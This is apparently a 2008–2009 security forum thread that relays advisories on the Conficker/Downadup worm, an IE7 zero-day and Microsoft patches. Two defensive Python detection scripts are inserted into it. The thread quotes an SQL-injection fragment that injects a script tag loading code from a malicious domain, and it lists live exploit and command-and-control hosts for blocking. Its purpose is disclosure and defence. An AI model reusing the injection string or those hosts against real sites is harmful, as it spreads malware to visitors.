Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have led our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

:fear::mad::fear:

AplusWebMaster
2008-12-10, 01:20
FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

:fear:

AplusWebMaster
2008-12-10, 01:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

:fear:

AplusWebMaster
2008-12-10, 14:12
FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

:fear::fear:

AplusWebMaster
2008-12-11, 12:45
FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet Explorer 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious executable called "ieupdate.exe". The download location is currently down, but could come back at any moment."

:fear::fear::mad::mad:

AplusWebMaster
2008-12-12, 13:43
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

:fear: :lip:

AplusWebMaster
2008-12-12, 13:56
FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date - Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

:fear::fear:

AplusWebMaster
2008-12-12, 17:47
Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135)
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

:fear::fear:

AplusWebMaster
2008-12-14, 14:18
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

:fear::fear:

AplusWebMaster
2008-12-15, 04:00
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

:fear:

AplusWebMaster
2008-12-15, 08:15
FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

:fear::fear::fear:

AplusWebMaster
2008-12-17, 20:25
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
December 17, 2008 - "Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078* to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844**..."

** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4844

> http://support.microsoft.com/?kbid=960714
Last Review: December 18, 2008 - Revision: 2.0

Microsoft Security Bulletin MS08-078 - Internet Explorer
Security Update for Internet Explorer (960714)
* http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
December 17, 2008
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...
(May require restart)

:fear:

AplusWebMaster
2008-12-23, 12:35
FYI...

Microsoft Security Advisory (961040)
Vulnerability in SQL Server Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961040.mspx
December 22, 2008 - "Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue. Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect systems that have had the workarounds* listed below applied. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. In addition, due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack. However, Microsoft is actively monitoring this situation to provide customer guidance as necessary...
* Workarounds...
Deny permissions on the sp_replwritetovarbin extended stored procedure..."

- http://support.microsoft.com/kb/961040
December 23, 2008

- http://isc.sans.org/diary.html?storyid=5545
Last Updated: 2008-12-23 14:13:19 UTC
___

- http://www.microsoft.com/technet/security/advisory/961040.mspx
Updated: February 10, 2009 - "...We have issued MS09-004* to address this issue... The vulnerability addressed is the SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416 ..."

* http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

:fear:

AplusWebMaster
2008-12-30, 21:03
FYI...

Microsoft Security Advisory (961509)
Research proves feasibility of collision attacks against MD5
- http://www.microsoft.com/technet/security/advisory/961509.mspx
December 30, 2008 - "Microsoft is aware that research was published at a security conference proving a successful attack against X.509 digital certificates signed using the MD5 hashing algorithm. This attack method could allow an attacker to generate additional digital certificates with different content that have the same digital signature as an original certificate. The MD5 algorithm had previously shown a vulnerability, but a practical attack had not yet been demonstrated. This new disclosure does not increase risk to customers significantly, as the researchers have not published the cryptographic background to the attack, and the attack is not repeatable without this information. Microsoft is not aware of any active attacks using this issue and is actively working with certificate authorities to ensure they are aware of this new research and is encouraging them to migrate to the newer SHA-1 signing algorithm. While this issue is not a vulnerability in a Microsoft product, Microsoft is actively monitoring the situation and has worked with affected Certificate Authorities to keep customers informed and to provide customer guidance as necessary...
Mitigating Factors...
• Most public Certificate Authority roots no longer use MD5 to sign certificates, but have upgraded to the more secure SHA-1 algorithm. Customers should contact their issuing Certificate Authority for guidance.
• When visited, Web sites that use Extended Validation (EV) certificates show a green address bar in most modern browsers. These certificates are always signed using SHA-1 and as such are not affected by this newly reported research...
Suggested Actions...
• Do not sign digital certificates with MD5
Certificate Authorities should no longer sign newly generated certificates using the MD5 algorithm, as it is known to be prone to collision attacks. Several alternative and more secure technologies are available, including SHA-1, SHA-256, SHA-384 or SHA-512.
Impact of action: Older hardware-based solutions may require upgrading to support these newer technologies...

:fear:
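
One practical check that follows from the advisory's suggested action, as an added example (not Microsoft's code): a standard-library Python script that reads the signatureAlgorithm OID out of a DER certificate and flags MD5-based signatures. The skeleton certificate it builds for itself is constructed and is not a real, verifiable certificate; the OID table and DER layout follow RFC 5280 and RFC 3279.

```python
"""Flag X.509 certificates whose signature uses MD5 (cf. MS advisory 961509).
Added example, standard library only. signatureAlgorithm is the second element
of the outer Certificate SEQUENCE (RFC 5280), so a minimal DER walker suffices.
The sample certificate built below is a constructed skeleton, not a real cert."""
import base64
import re

# PKCS#1 signature-algorithm OIDs (RFC 3279 / RFC 4055)
SIG_ALGS = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
}

def read_tlv(buf, pos=0):
    """Parse one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """Decode OBJECT IDENTIFIER content bytes into dotted form."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                    # last byte of this base-128 arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)

def pem_to_der(pem_text):
    """Strip PEM armour lines and base64-decode the body."""
    body = re.sub(r"-----[^-]+-----", "", pem_text)
    return base64.b64decode("".join(body.split()))

def signature_algorithm(der):
    """Return (oid, name) of the certificate's outer signatureAlgorithm."""
    tag, cert, _ = read_tlv(der)                # Certificate ::= SEQUENCE { ... }
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _tbs, pos = read_tlv(cert)               # tbsCertificate, skipped
    tag, alg_id, _ = read_tlv(cert, pos)        # signatureAlgorithm AlgorithmIdentifier
    oid_tag, oid_raw, _ = read_tlv(alg_id)      # its first element is the algorithm OID
    if tag != 0x30 or oid_tag != 0x06:
        raise ValueError("malformed AlgorithmIdentifier")
    oid = decode_oid(oid_raw)
    return oid, SIG_ALGS.get(oid, "unknown")

def is_md5_signed(der):
    """True when the certificate's signature hash is MD5, the advisory's concern."""
    return signature_algorithm(der)[1].startswith("md5")

# --- constructed sample input (DER encoders used only to build the skeleton) ---
def tlv(tag, payload):
    """Encode one DER TLV (short or long length form)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def encode_oid(dotted):
    """Encode a dotted OID as OBJECT IDENTIFIER content bytes."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:                          # prepend continuation bytes, high bit set
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return bytes(out)

def skeleton_cert(sig_oid):
    """Constructed DER skeleton with placeholder tbsCertificate and signature but a
    real AlgorithmIdentifier layout, so the parser sees the same structure as a cert."""
    tbs = tlv(0x30, tlv(0x02, b"\x01"))                             # placeholder
    alg = tlv(0x30, tlv(0x06, encode_oid(sig_oid)) + b"\x05\x00")   # OID + NULL params
    sig = tlv(0x03, b"\x00" * 17)                                   # placeholder BIT STRING
    return tlv(0x30, tbs + alg + sig)

if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.11"):
        der = skeleton_cert(oid)
        print(signature_algorithm(der), "MD5-signed:", is_md5_signed(der))
```

Feed `pem_to_der()` the contents of an exported .cer/.pem file to run the same check on a real chain.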

AplusWebMaster
2008-12-31, 19:00
FYI...

- http://isc.sans.org/diary.html?storyid=5596
Last Updated: 2008-12-31 14:26:41 UTC - "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067*. It does various things to install and hide itself on the infected computer. It removes any System Restore points that the user has set and disables the Windows Update Service. It looks for ADMIN$ shares on the local network and tries to brute force the share passwords with a built-in dictionary. At this point in time, the worm's purpose appears to be simply to spread and infect as many computers as possible. After January 1, 2009, it will try to reach out to a variety of web sites to pull down an updated copy of itself. You can find examples of the domain names in the Symantec W32.Downadup.B writeup**..."

Vulnerability in Server Service Could Allow Remote Code Execution (958644)
* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

** http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&tabid=2

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250

- http://secunia.com/advisories/32326
Last Update: 2008-10-24
Critical: Highly critical...

MS08-067 out-of-band netapi32.dll security update
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

- http://support.microsoft.com/?kbid=958644

- http://www.us-cert.gov/cas/techalerts/TA08-297A.html

:fear:

AplusWebMaster
2009-01-07, 06:51
FYI...

- http://preview.tinyurl.com/7jxs8z
01-06-2009 (Symantec blogs) - "... the most commonly infected systems appear to be Windows XP SP1 and earlier. Over 500,000 of the infected computers that contacted our server were running these operating system versions. Close behind was Windows XP SP2 and later systems. Windows 2000 and Windows 2003 had smaller shares. We believe that the W32.Downadup.A propagation routine has been very aggressive. It will continue to infect computers in the near future and receive updates via the aforementioned mechanism. Symantec discovered a new variant of this worm on December 30, 2008, dubbed W32.Downadup.B. This updated version contains additional propagation routines and what appears to be an altered domain generation routine. It’s not currently known if this new version was seeded to W32.Downadup.A infections or has independently spread through its own propagation routines.
We strongly encourage all users to ensure that the patches available in MS08-067 have been applied and that antivirus products are fully up-to-date to ensure that this threat does not find its way onto computers."
(Charts available at the URL above.)

:fear::mad::fear:

AplusWebMaster
2009-01-07, 15:16
FYI...

- http://www.f-secure.com/weblog/archives/00001574.html
January 6, 2009 - "Over the last (few) days, we've received reports of corporate networks getting infected with variants of MS08-067 worms. These are mostly Downadup/Conficker variants. The malware uses server-side polymorphism and ACL modification to make network disinfection particularly difficult. A sign of infection is that user accounts become locked out of an Active Directory domain as the worm attempts to crack account passwords using a built-in dictionary. When it fails, it leads to those accounts being locked. We have detailed information about the malware functionality in our Downadup.AL description*. We also have a separate tool available to assist in disinfecting. The tool is available from here**. We also recommend system administrators block access to web sites used by the worm..." (Long list available at the URL above.)

* http://www.f-secure.com/v-descs/worm_w32_downadup_al.shtml

** ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
Last revised: 11/21/2008
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear::mad:
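
The account-lockout symptom described in this post and in the 2008-12-31 ISC summary above can be spotted in the Security log before lockouts pile up, as this added Python example shows (not F-Secure's, Symantec's or ISC's code): one source host producing bad-password failures against many distinct accounts in a short window. The CSV field layout is an assumption and the log lines are constructed for the example.

```python
"""Detect the Downadup/Conficker dictionary-attack pattern in failed-logon events.

Added example, not vendor code. The worm's built-in dictionary shows up as one
source host generating bad-password failures against many different accounts in
a short time, which is what drives the lockouts. Input is an assumed CSV export
of Security-log fields (time, event id, target account, source workstation);
the lines below are constructed."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Bad-password logon failure: event 529 on Windows 2000/XP/2003, 4625 on Vista/2008.
FAILED_LOGON_EVENTS = {"529", "4625"}

# Constructed sample: WKS-017 walks six accounts in four seconds (worm pattern);
# WKS-042 is one user mistyping one password (not reported); 528 is a success.
SAMPLE_LOG = """\
time,event_id,account,source
2009-01-06 09:00:01,529,administrator,WKS-017
2009-01-06 09:00:02,529,jsmith,WKS-017
2009-01-06 09:00:02,529,backup,WKS-017
2009-01-06 09:00:03,529,svc_sql,WKS-017
2009-01-06 09:00:03,529,mbrown,WKS-017
2009-01-06 09:00:04,529,helpdesk,WKS-017
2009-01-06 09:05:00,529,jsmith,WKS-042
2009-01-06 09:05:30,529,jsmith,WKS-042
2009-01-06 09:06:00,4625,jsmith,WKS-042
2009-01-06 09:07:00,528,jsmith,WKS-042
"""

def parse_events(text):
    """Parse the CSV export into dicts with a datetime 'time' field."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["time"] = datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S")
        events.append(row)
    return events

def find_dictionary_sources(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source: accounts} for each source host whose bad-password failures
    hit at least min_accounts distinct accounts inside some span of `window`."""
    by_source = defaultdict(list)
    for e in events:
        if e["event_id"] in FAILED_LOGON_EVENTS:
            by_source[e["source"]].append((e["time"], e["account"]))

    flagged = {}
    for source, failures in by_source.items():
        failures.sort()
        start = 0
        for end in range(len(failures)):
            # slide the window start forward until failures[start:end+1] fits in `window`
            while failures[end][0] - failures[start][0] > window:
                start += 1
            accounts = {acct for _, acct in failures[start:end + 1]}
            if len(accounts) >= min_accounts:
                flagged[source] = flagged.get(source, set()) | accounts
    return flagged

if __name__ == "__main__":
    for host, accounts in find_dictionary_sources(parse_events(SAMPLE_LOG)).items():
        print(f"{host}: {len(accounts)} accounts targeted: {sorted(accounts)}")
```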

AplusWebMaster
2009-01-09, 21:20
FYI...

Downadup Blocklist
- http://www.f-secure.com/weblog/archives/00001577.html
January 9, 2009 - "Our post on Tuesday included a list of domains used by the Downadup worm. Today's list includes 1,500 additional sites used by the worm*."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist.txt

:fear::fear:

AplusWebMaster
2009-01-10, 03:16
More...

New variants of W32.Downadup.B find new ways to propagate
- http://preview.tinyurl.com/ay432s
01-09-2009 Symantec Security Response Blog - "Symantec has observed an increase in infections relating to W32.Downadup over the holiday period and is urging organizations to apply the patch for Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067) as soon as possible. A new variant of this threat, called W32.Downadup.B, appeared on December 30th and can not only propagate by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability, but can also spread through corporate networks by infecting USB sticks and accessing weak passwords... W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible. The worm also monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. This means infected users may not be able to update their security software from those websites. This can be problematic as worm authors generally dish out new variants constantly... Click here** to obtain more information about how to prevent a threat from spreading using the "AutoRun" feature... more detail on the evolution and infection statistics of this threat, check out the earlier Security Response blog posting*..."
W32.Downadup Infection Statistics
* http://preview.tinyurl.com/7jxs8z
01-06-2009 - "...graph shows the statistics, over a 72-hour period, of unique IP addresses versus unique IP address and user-agent pairs..."

** http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2008032111570648

:fear::fear::fear:

AplusWebMaster
2009-01-13, 14:37
FYI...

Preemptive Downadup Domain Blocklist, Jan. 13-16
- http://www.f-secure.com/weblog/archives/00001578.html
January 12, 2009 - "Downadup variants use algorithmically determined URLs to report back to the bad guys. Reverse engineering the worm's code provides us with the method to predict which domains may be used in the future. Today's preemptive blocklist* includes an additional 1,000 URLs that WILL BE used by the Downadup from the 13th to the 16th. Network administrators can use this list as a preventive measure."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist_13_16.txt

- http://isc.sans.org/diary.html?storyid=5671
Last Updated: 2009-01-12 22:43:54 UTC

- http://www.fortiguardcenter.com/reports/MS08-067-Conficker.html
(MS08-067 exploit activity from October 2008 to January 2009...) graphic

:fear::fear:

AplusWebMaster
2009-01-13, 20:26
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx
January 13, 2009 - "This bulletin summary lists security bulletins released for January 2009..." (-1-)

Microsoft Security Bulletin MS09-001
Vulnerabilities in SMB Could Allow Remote Code Execution (958687)
- http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5677
Last Updated: 2009-01-13 18:15:14 UTC
___

